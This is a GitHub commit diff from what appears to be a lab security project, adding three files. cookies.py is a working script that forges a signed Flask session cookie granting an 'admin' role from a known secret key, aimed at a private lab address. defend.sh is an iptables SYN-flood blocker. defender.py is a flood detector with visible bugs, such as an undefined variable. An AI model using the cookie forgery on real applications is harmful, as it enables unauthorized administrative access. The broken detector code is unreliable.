Push files to Github

cookies.py

@@ -0,0 +1,100 @@
+#!/usr/bin/env python
+
+import requests
+import sys
+import zlib
+from itsdangerous import base64_decode
+import ast
+from flask.sessions import SecureCookieSessionInterface
+
+
+wanted_cookie = '{"role": "admin" , "user" : "3"}' # Data that we want to sign
+
+url = "http://172.18.0.2:5000"
+
+s = requests.Session() # To keep track of the session's cookie
+
+
+class MockApp(object):
+
+    def __init__(self, secret_key):
+        self.secret_key = secret_key
+
+
+def login(user,password) : 
+    '''
+    @ user -> the username
+    @ password -> the passowrd
+    '''
+    data = {'email': user ,'password' : password }
+
+
+
+
+    print ("User : {0}".format(user))
+    print ("Password : {0}".format(password))
+    send = s.post( url + "/login" ,data = data ) #post to the login page the provided data 
+
+
+
+    #print(encode("secret",cookie_cracked))
+
+    if "No Such User" in send.text : 
+        print("STATUS : Failed Login")
+        print(s)
+
+        print('----------------------')
+    else : 
+        print("STATUS : LOGGED IN ")
+        print("Cookie : {0}".format(s.cookies['session']))   #if the user is logged in print his cookie
+        print('----------------------')
+    return s.cookies['session']
+
+def logout ():
+    s.get(url + "/logout")        
+def encode(secret_key, session_cookie_structure):
+        """ Encode a Flask session cookie """
+        try:
+            app = MockApp(secret_key)
+
+            session_cookie_structure = dict(ast.literal_eval(session_cookie_structure)) # Dividing the cookie into three parts to be read
+            si = SecureCookieSessionInterface()
+            s = si.get_signing_serializer(app)
+
+            return s.dumps(session_cookie_structure)
+        except Exception as e:
+            return "[Encoding error] {}".format(e)
+            raise e
+def decode(session_cookie_value, secret_key=None):
+        """ Decode a Flask cookie  """
+        try:
+            if(secret_key==None):
+                compressed = False
+                payload = session_cookie_value
+
+                if payload.startswith('.'):
+                    compressed = True
+                    payload = payload[1:]
+
+                data = payload.split(".")[0] # The first section is the session data
+
+                data = base64_decode(data)
+                if compressed:
+                    data = zlib.decompress(data)
+
+                return data
+            else:
+                app = MockApp(secret_key)
+
+                si = SecureCookieSessionInterface()
+                s = si.get_signing_serializer(app)
+
+                return s.loads(session_cookie_value)
+        except Exception as e:
+            return "[Decoding error] {}".format(e)
+            raise e
+if __name__ == "__main__" : 
+    print("Connecting to {0} ...... ".format(url))  
+    print(encode("Sup3r_SeKret_T0ken" , wanted_cookie))
+    #print("LOGGING OUT ")
+    logout()

defend.sh

@@ -0,0 +1,28 @@
+# Description : SYN Flood Prevention using iptables against Scapy SYN packets generated
+> /var/log/DDOS_IP.log
+> /tmp/test1.txt
+> /tmp/test2.txt
+trap "echo ;echo Caught EXIT signal;iptables -F;echo Iptables entries cleared;echo HaX0R SVP" EXIT
+while true;
+do
+date >> /var/log/DDOS_IP.log
+netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | sort | uniq -c >> /var/log/DDOS_IP.log
+for pip in `netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | sort | uniq`
+do
+conntrack=`netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | grep $pip | wc -l`;
+while read line
+do
+if [ "$line" = "$pip" ]
+then
+continue 2
+fi
+done < /tmp/test2.txt
+if [ "$conntrack" -gt "25" ]
+then
+iptables -I INPUT -s $pip -p tcp -j REJECT --reject-with tcp-reset
+echo "$pip" >> /tmp/test1.txt
+fi
+done
+cat /tmp/test1.txt | sort | uniq > /tmp/test2.txt
+sleep $1
+done

defender.py

@@ -0,0 +1,90 @@
+from scapy.all import * 
+
+import requests
+
+import netifaces as ni
+import getpass
+
+import telnetlib
+
+
+
+
+
+def check_pragma_attack(request):
+    pragma_count = 0
+    value = request.headers
+    if ('PRAGMA' not in value):
+        print("PRAGMA header not detected")  
+        return False
+    else:
+        print("PRAGMA header detected")    
+        pragma_count += pragma_count
+        pragma_value = request.headers["PRAGMA"]
+        if (int(content_length) <= 2000000):
+
+
+            print("WARNING !") 
+            return True
+        else:
+            return False    
+
+
+
+
+
+def check_availability(url):
+
+    response = requests.get(url)
+    if (response.status_code != 503):
+        print("{0}: Available".format(url))
+        print("Resuming .../")
+        return True        
+def check_http_post_attack(request):
+    value = request.headers
+    if ('Content-Length' not in value):
+        return True
+    else:
+        content_length = request.headers["Content-Length"]
+        if (int(content_length) <= 2000000):
+
+            print("Content length is fine")  
+            print("Resuming .../") 
+            return True
+        else:
+            return False    
+
+
+if __name__ == "__main__":
+    ip = ni.ifaddresses('br-abfe242530cd')[ni.AF_INET][0]['addr']
+
+    url = "http://{0}:5000".format(ip)  
+    HOST = "localhost"
+    user = "USER"
+    #password = getpass.getpass()
+
+    #tn = telnetlib.Telnet(HOST)
+
+    #tn.read_until(b"login: ")
+    #tn.write(user.encode('ascii') + b"\n")
+    #if password:
+      #  tn.read_until(b"Password: ")
+     #   tn.write(password.encode('ascii') + b"\n")
+
+    #tn.write(b"ls\n")
+    #tn.write(b"exit\n")
+
+    #print(tn.read_all().decode('ascii'))
+    response = requests.get(url)
+    check_availability(url)
+    check_http_post_attack(response)
+    check_pragma_attack(response)
+    pkts = sniff(iface="br-abfe242530cd",prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{IP:%IP.ttl%\n}{Raw:%Raw.load%\n}"))
+
+
+
+
+
+
+
+